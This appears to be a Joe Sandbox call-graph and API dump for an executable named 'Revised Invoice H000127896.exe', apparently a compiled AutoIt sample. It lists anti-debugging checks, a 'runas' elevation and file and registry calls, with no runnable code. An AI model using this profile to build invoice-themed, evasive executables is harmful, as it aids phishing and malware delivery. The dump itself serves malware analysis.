87890->86865 87891 408f40 VariantClear 87892 408d45 moneypunct 87891->87892 87892->87890 87892->87891 87894 425c87 87893->87894 87895 40d15f 87893->87895 87896 425cc7 87894->87896 87897 425ca1 TranslateAcceleratorW 87894->87897 87895->86865 87897->87895 87899 42602f 87898->87899 87902 40d17f 87898->87902 87899->86865 87900 40d18c 87900->86865 87901 42608e IsDialogMessageW 87901->87900 87901->87902 87902->87900 87902->87901 88446 430c46 GetClassLongW 87902->88446 87905 4096c6 _wcslen 87904->87905 87906 4115d7 52 API calls 87905->87906 87971 40a70c moneypunct _memmove 87905->87971 87907 4096fa _memmove 87906->87907 87908 4115d7 52 API calls 87907->87908 87910 40971b 87908->87910 87909 4013a0 52 API calls 87911 4297aa 87909->87911 87912 409749 CharUpperBuffW 87910->87912 87916 40976a moneypunct 87910->87916 87910->87971 87913 4115d7 52 API calls 87911->87913 87912->87916 87921 4297d1 _memmove 87913->87921 87954 4097e5 moneypunct 87916->87954 88448 47dcbb 196 API calls 87916->88448 87917 408f40 VariantClear 87918 42ae92 87917->87918 88475 410c60 VariantClear moneypunct 87918->88475 87920 42aea4 88474 45e737 90 API calls 3 library calls 87921->88474 87922 409aa2 87922->87921 87924 4115d7 52 API calls 87922->87924 87929 409afe 87922->87929 87923 40a689 87926 4115d7 52 API calls 87923->87926 87924->87929 87925 4115d7 52 API calls 87925->87954 87945 40a6af moneypunct _memmove 87926->87945 87927 409b2a 87931 429dbe 87927->87931 87975 409b4d moneypunct _memmove 87927->87975 88456 40b400 VariantClear VariantClear moneypunct 87927->88456 87928 40c2c0 52 API calls 87928->87954 87929->87927 87930 4115d7 52 API calls 87929->87930 87932 429d31 87930->87932 87936 429dd3 87931->87936 88457 40b400 VariantClear VariantClear moneypunct 87931->88457 87935 429d42 87932->87935 88453 44a801 52 API calls 87932->88453 87933 429a46 VariantClear 87933->87954 87943 40e0a0 52 API calls 87935->87943 87936->87975 88458 40e1c0 VariantClear moneypunct 87936->88458 87937 408f40 VariantClear 87937->87954 87940 40a045 87947 4115d7 52 API calls 87940->87947 87941 42a3f5 88461 47390f VariantClear 87941->88461 87949 429d57 87943->87949 87953 4115d7 52 API calls 87945->87953 87948 40a04c 87947->87948 87955 40a0a7 87948->87955 87958 4091e0 317 API calls 87948->87958 88454 453443 52 API calls 87949->88454 87951 42a42f 88462 45e737 90 API calls 3 library calls 87951->88462 87953->87971 87954->87921 87954->87922 87954->87923 87954->87925 87954->87928 87954->87933 87954->87937 87954->87945 87956 4299d9 87954->87956 87959 429abd 87954->87959 87967 40a780 194 API calls 87954->87967 87969 42a452 87954->87969 88449 40c4e0 194 API calls 87954->88449 88451 40ba10 52 API calls 2 library calls 87954->88451 88452 40e270 VariantClear moneypunct 87954->88452 87976 40a0af 87955->87976 88463 40c790 VariantClear moneypunct 87955->88463 87960 408f40 VariantClear 87956->87960 87958->87955 87959->86865 87962 4299e2 87960->87962 87961 429d88 88455 453443 52 API calls 87961->88455 88450 410c60 VariantClear moneypunct 87962->88450 87967->87954 87968 402780 52 API calls 87968->87975 87969->87917 87971->87909 87972 4115d7 52 API calls 87972->87975 87973 44a801 52 API calls 87973->87975 87975->87941 87975->87951 87975->87968 87975->87971 87975->87972 87975->87973 87981 40a780 194 API calls 87975->87981 87983 401980 53 API calls 87975->87983 87984 408e80 VariantClear 87975->87984 87990 41130a 51 API calls __cinit 87975->87990 87994 409fd2 87975->87994 87996 409c95 87975->87996 88459 45f508 52 API calls 87975->88459 88460 403e10 53 API calls 87975->88460 87979 40a11b 87976->87979 87980 42a4b4 VariantClear 87976->87980 88006 40a162 moneypunct _memmove 87976->88006 87977 40a650 moneypunct 87977->86865 87978 408f40 VariantClear 87978->88006 87986 40a12d moneypunct 87979->87986 88464 40e270 VariantClear moneypunct 87979->88464 87980->87986 87981->87975 87983->87975 87984->87975 87985 4115d7 52 API calls 87985->88006 87986->87985 87986->88006 87987 408e80 VariantClear 87987->88006 87989 42a74d VariantClear 87989->88006 87990->87975 87991 40a368 87993 42aad4 87991->87993 88000 40a397 87991->88000 87992 40e270 VariantClear 87992->88006 88467 46fe90 VariantClear VariantClear moneypunct 87993->88467 87994->87940 87994->87941 87995 42a7e4 VariantClear 87995->88006 87996->86865 87997 42a886 VariantClear 87997->88006 87998 40a3ce 88012 40a3d9 moneypunct 87998->88012 88468 40b400 VariantClear VariantClear moneypunct 87998->88468 88000->87998 88024 40a42c moneypunct 88000->88024 88447 40b400 VariantClear VariantClear moneypunct 88000->88447 88003 4115d7 52 API calls 88003->88006 88004 42abaf 88008 42abd4 VariantClear 88004->88008 88015 40a4ee moneypunct 88004->88015 88005 4115d7 52 API calls 88009 42a5a6 VariantInit VariantCopy 88005->88009 88006->87978 88006->87987 88006->87989 88006->87991 88006->87992 88006->87993 88006->87995 88006->87997 88006->88003 88006->88005 88465 470870 52 API calls 88006->88465 88466 44ccf1 VariantClear moneypunct 88006->88466 88007 40a4dc 88007->88015 88470 40e270 VariantClear moneypunct 88007->88470 88008->88015 88009->88006 88014 42a5c6 VariantClear 88009->88014 88010 42ac4f 88019 42ac79 VariantClear 88010->88019 88025 40a546 moneypunct 88010->88025 88013 40a41a 88012->88013 88017 42ab44 VariantClear 88012->88017 88012->88024 88013->88024 88469 40e270 VariantClear moneypunct 88013->88469 88014->88006 88015->88010 88016 40a534 88015->88016 88016->88025 88471 40e270 VariantClear moneypunct 88016->88471 88017->88024 88019->88025 88020 42ad28 88026 42ad4e VariantClear 88020->88026 88030 40a583 moneypunct 88020->88030 88023 40a571 88023->88030 88472 40e270 VariantClear moneypunct 88023->88472 88024->88004 88024->88007 88025->88020 88025->88023 88026->88030 88028 42ae0e VariantClear 88028->88030 88030->87977 88030->88028 88473 40e270 VariantClear moneypunct 88030->88473 88031->86865 88032->86814 88033->86819 88034->86865 88035->86865 88036->86865 88037->86865 88038->86871 88039->86871 88040->86871 88041->86871 88042->86871 88043->86871 88044->86871 88046 403cdf 88045->88046 88047 408f40 VariantClear 88046->88047 88048 403ce7 88047->88048 88048->86859 88049->86871 88050->86871 88051->86865 88052->86811 88054 408e88 88053->88054 88056 408e94 88053->88056 88055 408f40 VariantClear 88054->88055 88055->88056 88057 45340c 85 API calls 88056->88057 88057->87777 88058->87781 88059->87783 88060->87785 88061->87768 88062->87776 88063->87792 88064->87795 88065->87814 88066->87815 88067->87776 88069 40a7a6 88068->88069 88070 40ae8c 88068->88070 88072 4115d7 52 API calls 88069->88072 88111 41130a 51 API calls __cinit 88070->88111 88106 40a7c6 moneypunct _memmove 88072->88106 88073 40a86d 88074 40abd1 88073->88074 88091 40a878 moneypunct 88073->88091 88116 45e737 90 API calls 3 library calls 88074->88116 88076 401b10 52 API calls 88076->88106 88077 40b5f0 89 API calls 88077->88106 88078 408e80 VariantClear 88078->88106 88079 42b791 VariantClear 88079->88106 88080 42ba2d VariantClear 88080->88106 88081 408f40 VariantClear 88081->88091 88082 42b459 VariantClear 88082->88106 88083 40a884 moneypunct 88083->87814 88084 408cc0 187 API calls 88084->88106 88085 40e270 VariantClear 88085->88106 88086 42b6f6 VariantClear 88086->88106 88088 40bc10 53 API calls 88088->88106 88089 42bc5b 88089->87814 88090 42bb6a 88119 44b92d VariantClear 88090->88119 88091->88081 88091->88083 88092 42bbf5 88117 45e737 90 API calls 3 library calls 88092->88117 88094 4115d7 52 API calls 88096 42b5b3 VariantInit VariantCopy 88094->88096 88095 408f40 VariantClear 88095->88106 88100 42b5d7 VariantClear 88096->88100 88096->88106 88098 4115d7 52 API calls 88098->88106 88100->88106 88102 42bc37 88118 45e737 90 API calls 3 library calls 88102->88118 88105 42bc48 88105->88090 88107 408f40 VariantClear 88105->88107 88106->88073 88106->88074 88106->88076 88106->88077 88106->88078 88106->88079 88106->88080 88106->88082 88106->88084 88106->88085 88106->88086 88106->88088 88106->88090 88106->88092 88106->88094 88106->88095 88106->88098 88106->88102 88108 4530c9 VariantClear 88106->88108 88112 45308a 53 API calls 88106->88112 88113 470870 52 API calls 88106->88113 88114 457f66 87 API calls __write_nolock 88106->88114 88115 472f47 127 API calls 88106->88115 88107->88090 88108->88106 88109->87802 88110->87805 88111->88106 88112->88106 88113->88106 88114->88106 88115->88106 88116->88090 88117->88090 88118->88105 88119->88089 88120->87822 88121->87826 88122->87837 88123->87841 88124->87830 88125->87849 88126->87876 88127->87849 88128->87878 88129->87849 88130->87878 88131->87862 88132->87878 88133->87863 88134->87878 88135->87878 88136->87857 88138 4289d2 88137->88138 88139 408db3 88137->88139 88168 45e737 90 API calls 3 library calls 88138->88168 88166 40bec0 90 API calls 88139->88166 88142 4289e5 88169 45e737 90 API calls 3 library calls 88142->88169 88143 408e5a 88143->87884 88146 428a05 88148 408f40 VariantClear 88146->88148 88147 408dc9 88147->88142 88147->88143 88147->88146 88149 40a780 194 API calls 88147->88149 88150 408e64 88147->88150 88152 408f40 VariantClear 88147->88152 88167 40ba10 52 API calls 2 library calls 88147->88167 88148->88143 88149->88147 88151 408f40 VariantClear 88150->88151 88151->88143 88152->88147 88154 408f40 VariantClear 88153->88154 88155 403d20 88154->88155 88156 403cd0 VariantClear 88155->88156 88157 403d4d 88156->88157 88170 46e91c 88157->88170 88173 467897 88157->88173 88217 4755ad 88157->88217 88220 40de10 88157->88220 88225 45e17d 88157->88225 88158 403d76 88158->87881 88158->87892 88164->87881 88165->87883 88166->88147 88167->88147 88168->88142 88169->88146 88235 46e785 88170->88235 88172 46e92f 88172->88158 88174 4678bb 88173->88174 88207 467954 88174->88207 88339 45340c 85 API calls 88174->88339 88175 4115d7 52 API calls 88176 467989 88175->88176 88178 467995 88176->88178 88343 40da60 53 API calls 88176->88343 88182 4533eb 85 API calls 88178->88182 88179 4678f6 88181 413a0e __wsplitpath 46 API calls 88179->88181 88183 4678fc 88181->88183 88184 4679b7 88182->88184 88185 401b10 52 API calls 88183->88185 88187 40de40 60 API calls 88184->88187 88186 46790c 88185->88186 88340 40d200 52 API calls 2 library calls 88186->88340 88188 4679c3 88187->88188 88190 4679c7 GetLastError 88188->88190 88191 467a05 88188->88191 88193 403cd0 VariantClear 88190->88193 88196 467a2c 88191->88196 88197 467a4b 88191->88197 88192 467917 88192->88207 88341 4339fa GetFileAttributesW FindFirstFileW FindClose 88192->88341 88194 4679dc 88193->88194 88198 4679e6 88194->88198 88203 44ae3e CloseHandle 88194->88203 88201 4115d7 52 API calls 88196->88201 88199 4115d7 52 API calls 88197->88199 88206 408f40 VariantClear 88198->88206 88204 467a49 88199->88204 88200 467928 88205 46792f 88200->88205 88200->88207 88202 467a31 88201->88202 88344 436299 52 API calls 2 library calls 88202->88344 88203->88198 88212 408f40 VariantClear 88204->88212 88342 4335cd 56 API calls 3 library calls 88205->88342 88211 4679ed 88206->88211 88207->88175 88208 467964 88207->88208 88208->88158 88211->88158 88214 467a88 88212->88214 88213 467939 88213->88207 88215 408f40 VariantClear 88213->88215 88214->88158 88216 467947 88215->88216 88216->88207 88345 475077 88217->88345 88219 4755c0 88219->88158 88221 4115d7 52 API calls 88220->88221 88222 40de23 88221->88222 88223 40da20 CloseHandle 88222->88223 88224 40de2e 88223->88224 88224->88158 88226 45e198 88225->88226 88227 45e19c 88226->88227 88228 45e1b8 88226->88228 88229 408f40 VariantClear 88227->88229 88230 45e1db FindClose 88228->88230 88232 45e1cc 88228->88232 88231 45e1a4 88229->88231 88233 45e1d9 moneypunct 88230->88233 88231->88158 88232->88233 88234 44ae3e CloseHandle 88232->88234 88233->88158 88234->88233 88236 46e7a2 88235->88236 88237 4115d7 52 API calls 88236->88237 88240 46e802 88236->88240 88238 46e7ad 88237->88238 88239 46e7b9 88238->88239 88283 40da60 53 API calls 88238->88283 88284 4533eb 88239->88284 88241 46e7e5 88240->88241 88248 46e82f 88240->88248 88243 408f40 VariantClear 88241->88243 88245 46e7ea 88243->88245 88245->88172 88247 46e8b5 88276 4680ed 88247->88276 88248->88247 88251 46e845 88248->88251 88254 4533eb 85 API calls 88251->88254 88253 46e8bb 88280 443fbe 88253->88280 88263 46e84b 88254->88263 88255 46e7db 88255->88241 88300 44ae3e 88255->88300 88256 46e87a 88303 4689f4 59 API calls 88256->88303 88260 46e883 88262 4013c0 52 API calls 88260->88262 88264 46e88f 88262->88264 88263->88256 88263->88260 88266 40e0a0 52 API calls 88264->88266 88265 408f40 VariantClear 88274 46e881 88265->88274 88267 46e899 88266->88267 88304 40d200 52 API calls 2 library calls 88267->88304 88269 46e911 88269->88172 88270 46e8a5 88305 4689f4 59 API calls 88270->88305 88273 46e903 88275 44ae3e CloseHandle 88273->88275 88274->88269 88306 40da20 88274->88306 88275->88269 88277 4680fa 88276->88277 88279 468100 88276->88279 88310 467ac4 55 API calls 2 library calls 88277->88310 88279->88253 88311 443e36 88280->88311 88282 443fd3 88282->88265 88282->88274 88283->88239 88285 453404 88284->88285 88286 4533f8 88284->88286 88288 40de40 88285->88288 88286->88285 88318 4531b1 85 API calls 5 library calls 88286->88318 88289 40da20 CloseHandle 88288->88289 88290 40de4e 88289->88290 88319 40f110 88290->88319 88293 4264fa 88295 40de84 88328 40e080 SetFilePointerEx SetFilePointerEx 88295->88328 88297 40de8b 88329 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88297->88329 88299 40de90 88299->88248 88299->88255 88301 44ae4b moneypunct 88300->88301 88331 443fdf 88300->88331 88301->88241 88303->88274 88304->88270 88305->88274 88307 40da37 88306->88307 88308 40da29 88306->88308 88307->88308 88309 40da3c CloseHandle 88307->88309 88308->88273 88309->88273 88310->88279 88314 443e19 88311->88314 88315 443e26 88314->88315 88316 443e32 WriteFile 88314->88316 88317 443db4 SetFilePointerEx SetFilePointerEx 88315->88317 88316->88282 88317->88316 88318->88285 88320 40f125 CreateFileW 88319->88320 88321 42630c 88319->88321 88323 40de74 88320->88323 88322 426311 CreateFileW 88321->88322 88321->88323 88322->88323 88324 426337 88322->88324 88323->88293 88327 40dea0 55 API calls moneypunct 88323->88327 88330 40df90 SetFilePointerEx SetFilePointerEx 88324->88330 88326 426342 88326->88323 88327->88295 88328->88297 88329->88299 88330->88326 88339->88179 88340->88192 88341->88200 88342->88213 88343->88178 88344->88204 88346 4533eb 85 API calls 88345->88346 88347 4750b8 88346->88347 88348 4750ee 88347->88348 88349 475129 88347->88349 88351 408f40 VariantClear 88348->88351 88398 4646e0 88349->88398 88356 4750f5 88351->88356 88352 47515e 88353 475162 88352->88353 88391 47518e 88352->88391 88354 408f40 VariantClear 88353->88354 88385 475169 88354->88385 88355 475357 88357 475365 88355->88357 88358 4754ea 88355->88358 88356->88219 88432 44b3ac 57 API calls 88357->88432 88438 464812 92 API calls 88358->88438 88362 4754fc 88363 475374 88362->88363 88365 475508 88362->88365 88411 430d31 88363->88411 88364 4533eb 85 API calls 88364->88391 88366 408f40 VariantClear 88365->88366 88369 47550f 88366->88369 88369->88385 88370 475388 88418 4577e9 88370->88418 88372 47539e 88373 475480 88375 408f40 VariantClear 88373->88375 88375->88385 88383 4754b5 88384 408f40 VariantClear 88383->88384 88384->88385 88385->88219 88391->88355 88391->88364 88391->88373 88391->88383 88391->88391 88430 436299 52 API calls 2 library calls 88391->88430 88431 463ad5 64 API calls __wcsicoll 88391->88431 88441 4536f7 53 API calls 88398->88441 88400 4646fc 88442 4426cd 59 API calls _wcslen 88400->88442 88402 464711 88404 40bc70 52 API calls 88402->88404 88410 46474b 88402->88410 88405 46472c 88404->88405 88443 461465 52 API calls _memmove 88405->88443 88407 464741 88408 40c600 52 API calls 88407->88408 88408->88410 88409 464793 88409->88352 88410->88409 88444 463ad5 64 API calls __wcsicoll 88410->88444 88412 430db2 88411->88412 88413 430d54 88411->88413 88412->88370 88414 4115d7 52 API calls 88413->88414 88415 430d74 88414->88415 88416 430da9 88415->88416 88417 4115d7 52 API calls 88415->88417 88416->88370 88417->88415 88419 457a84 88418->88419 88425 45780c _strcat moneypunct _wcslen _wcscpy 88418->88425 88419->88372 88425->88419 88430->88391 88431->88391 88432->88363 88438->88362 88441->88400 88442->88402 88443->88407 88444->88409 88446->87902 88447->87998 88448->87916 88449->87954 88450->87977 88451->87954 88452->87954 88453->87935 88454->87961 88455->87927 88456->87931 88457->87936 88458->87975 88459->87975 88460->87975 88461->87951 88462->87969 88463->87955 88464->87986 88465->88006 88466->88006 88467->87998 88468->88012 88469->88024 88470->88015 88471->88025 88472->88030 88473->88030 88474->87969 88475->87920 88476 42d154 88480 480a8d 88476->88480 88478 42d161 88479 480a8d 194 API calls 88478->88479 88479->88478 88481 480ae4 88480->88481 88482 480b26 88480->88482 88484 480aeb 88481->88484 88485 480b15 88481->88485 88483 40bc70 52 API calls 88482->88483 88503 480b2e 88483->88503 88487 480aee 88484->88487 88488 480b04 88484->88488 88513 4805bf 194 API calls 88485->88513 88487->88482 88490 480af3 88487->88490 88512 47fea2 194 API calls __itow_s 88488->88512 88511 47f135 194 API calls 88490->88511 88491 40e0a0 52 API calls 88491->88503 88494 408f40 VariantClear 88496 481156 88494->88496 88495 480aff 88495->88494 88498 408f40 VariantClear 88496->88498 88497 40c2c0 52 API calls 88497->88503 88499 48115e 88498->88499 88499->88478 88500 40e710 53 API calls 88500->88503 88501 401980 53 API calls 88501->88503 88503->88491 88503->88495 88503->88497 88503->88500 88503->88501 88504 408e80 VariantClear 88503->88504 88505 40a780 194 API calls 88503->88505 88506 480ff5 88503->88506 88514 45377f 52 API calls 88503->88514 88515 45e951 53 API calls 88503->88515 88516 40e830 53 API calls 88503->88516 88517 47925f 53 API calls 88503->88517 88518 47fcff 194 API calls 88503->88518 88504->88503 88505->88503 88519 45e737 90 API calls 3 library calls 88506->88519 88511->88495 88512->88495 88513->88495 88514->88503 88515->88503 88516->88503 88517->88503 88518->88503 88519->88495 88520 42b14b 88527 40bc10 88520->88527 88522 42b159 88523 4096a0 331 API calls 88522->88523 88524 42b177 88523->88524 88538 44b92d VariantClear 88524->88538 88526 42bc5b 88528 40bc24 88527->88528 88529 40bc17 88527->88529 88531 40bc2a 88528->88531 88532 40bc3c 88528->88532 88530 408e80 VariantClear 88529->88530 88533 40bc1f 88530->88533 88534 408e80 VariantClear 88531->88534 88535 4115d7 52 API calls 88532->88535 88533->88522 88536 40bc33 88534->88536 88537 40bc43 88535->88537 88536->88522 88537->88522 88538->88526 88539 425b2b 88544 40f000 88539->88544 88543 425b3a 88545 4115d7 52 API calls 88544->88545 88546 40f007 88545->88546 88547 4276ea 88546->88547 88553 40f030 88546->88553 88552 41130a 51 API calls __cinit 88552->88543 88554 40f039 88553->88554 88555 40f01a 88553->88555 88583 41130a 51 API calls __cinit 88554->88583 88557 40e500 88555->88557 88558 40bc70 52 API calls 88557->88558 88559 40e515 GetVersionExW 88558->88559 88560 402160 52 API calls 88559->88560 88561 40e557 88560->88561 88584 40e660 88561->88584 88567 427674 88571 4276c6 GetSystemInfo 88567->88571 88569 40e5e0 88572 4276d5 GetSystemInfo 88569->88572 88598 40efd0 88569->88598 88570 40e5cd GetCurrentProcess 88605 40ef20 LoadLibraryA GetProcAddress 88570->88605 88571->88572 88576 40e629 88602 40ef90 88576->88602 88579 40e641 FreeLibrary 88580 40e644 88579->88580 88581 40e653 FreeLibrary 88580->88581 88582 40e656 88580->88582 88581->88582 88582->88552 88583->88555 88585 40e667 88584->88585 88586 42761d 88585->88586 88587 40c600 52 API calls 88585->88587 88588 40e55c 88587->88588 88589 40e680 88588->88589 88590 40e687 88589->88590 88591 427616 88590->88591 88592 40c600 52 API calls 88590->88592 88593 40e566 88592->88593 88593->88567 88594 40ef60 88593->88594 88595 40e5c8 88594->88595 88596 40ef66 LoadLibraryA 88594->88596 88595->88569 88595->88570 88596->88595 88597 40ef77 GetProcAddress 88596->88597 88597->88595 88599 40e620 88598->88599 88600 40efd6 LoadLibraryA 88598->88600 88599->88571 88599->88576 88600->88599 88601 40efe7 GetProcAddress 88600->88601 88601->88599 88606 40efb0 LoadLibraryA GetProcAddress 88602->88606 88604 40e632 GetNativeSystemInfo 88604->88579 88604->88580 88605->88569 88606->88604 88607 40a6020 88621 40a3c70 88607->88621 88609 40a60ed 88624 40a5f10 88609->88624 88627 40a7110 GetPEB 88621->88627 88623 40a42fb 88623->88609 88625 40a5f19 Sleep 88624->88625 88626 40a5f27 88625->88626 88628 40a713a 88627->88628 88628->88623 88629 425b5e 88634 40c7f0 88629->88634 88633 425b6d 88669 40db10 52 API calls 88634->88669 88636 40c82a 88670 410ab0 6 API calls 88636->88670 88638 40c86d 88639 40bc70 52 API calls 88638->88639 88640 40c877 88639->88640 88641 40bc70 52 API calls 88640->88641 88642 40c881 88641->88642 88643 40bc70 52 API calls 88642->88643 88644 40c88b 88643->88644 88645 40bc70 52 API calls 88644->88645 88646 40c8d1 88645->88646 88647 40bc70 52 API calls 88646->88647 88648 40c991 88647->88648 88671 40d2c0 52 API calls 88648->88671 88650 40c99b 88672 40d0d0 53 API calls 88650->88672 88652 40c9c1 88653 40bc70 52 API calls 88652->88653 88654 40c9cb 88653->88654 88673 40e310 53 API calls 88654->88673 88656 40ca28 88657 408f40 VariantClear 88656->88657 88658 40ca30 88657->88658 88659 408f40 VariantClear 88658->88659 88660 40ca38 GetStdHandle 88659->88660 88661 429630 88660->88661 88662 40ca87 88660->88662 88661->88662 88663 429639 88661->88663 88668 41130a 51 API calls __cinit 88662->88668 88674 4432c0 57 API calls 88663->88674 88665 429641 88675 44b6ab CreateThread 88665->88675 88667 42964f CloseHandle 88667->88662 88668->88633 88669->88636 88670->88638 88671->88650 88672->88652 88673->88656 88674->88665 88675->88667 88676 44b5cb 58 API calls 88675->88676 88677 425b6f 88682 40dc90 88677->88682 88681 425b7e 88683 40bc70 52 API calls 88682->88683 88684 40dd03 88683->88684 88690 40f210 88684->88690 88686 40ddb7 88689 41130a 51 API calls __cinit 88686->88689 88687 40dd96 88687->88686 88693 40dc00 52 API calls 2 library calls 88687->88693 88689->88681 88694 40f250 RegOpenKeyExW 88690->88694 88692 40f230 88692->88687 88693->88687 88695 425e17 88694->88695 88696 40f275 RegQueryValueExW 88694->88696 88695->88692 88697 40f2c3 RegCloseKey 88696->88697 88698 40f298 88696->88698 88697->88692 88699 40f2a9 RegCloseKey 88698->88699 88700 425e1d 88698->88700 88699->88692
                              APIs
                              • _wcslen.LIBCMT ref: 004096C1
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • _memmove.LIBCMT ref: 0040970C
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                              • _memmove.LIBCMT ref: 00409D96
                              • _memmove.LIBCMT ref: 0040A6C4
                              • _memmove.LIBCMT ref: 004297E5
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                              • String ID:
                              • API String ID: 2383988440-0
                              • Opcode ID: 0c7f704c1111840706a6f5d41559473282fc5ae19e9abcecf6c32e7dc2e8fb44
                              • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                              • Opcode Fuzzy Hash: 0c7f704c1111840706a6f5d41559473282fc5ae19e9abcecf6c32e7dc2e8fb44
                              • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                              Control-flow Graph

                              APIs
                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Revised Invoice H000127896.exe,00000104,?), ref: 00401F4C
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                              • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                              • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Revised Invoice H000127896.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                              • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                              • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                              • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                              • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                              • String ID: C:\Users\user\Desktop\Revised Invoice H000127896.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                              • API String ID: 2495805114-292755461
                              • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                              • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                              • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                              • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                              Control-flow Graph

                              • Executed
                              • Not Executed
